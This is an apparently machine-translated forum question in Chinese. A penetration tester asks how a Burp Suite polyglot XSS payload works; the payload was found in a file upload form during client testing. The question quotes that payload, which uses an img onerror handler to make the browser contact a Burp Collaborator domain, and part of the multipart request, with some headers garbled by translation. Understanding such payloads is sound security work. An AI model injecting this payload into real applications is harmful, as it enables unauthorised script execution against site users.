解码burp XSS DNS解析负载（复杂JavaScript样式）

作为我客户工作的一部分，我正在针对易受攻击的应用程序测试

burp

。有一个成功的xss负载与

DNS查找

相关，它在文件上载点处理

表单数据

。这是

有效负载的一部分

javascript:/*</script><img/onerror='-/"/-/ onmouseover=1/-/[`*/[]/[(new(Image)).src=(/;/+/7mu0war5msdjnc8auyu75qw2ntttht9h18p0cs0hX;.burpcollaborator.net/).replace(/.;/g,[])]//'src=>
------WebKitFormBoundaryvITwh4thvzw75H3d
Content-Disposition: form-data; name="description"

javascript:/*
------WebKitFormBoundaryvITwh4thvzw75H3d
内容配置：表单数据；name=“description”

答复如下：

我需要帮助破译JavaScript负载，因为它看起来非常复杂，需要编程技巧

src
标记替换为DNS解析的输出

我很感激如果有人能一件一件地解码这个有效载荷是如何实际制作的，谢谢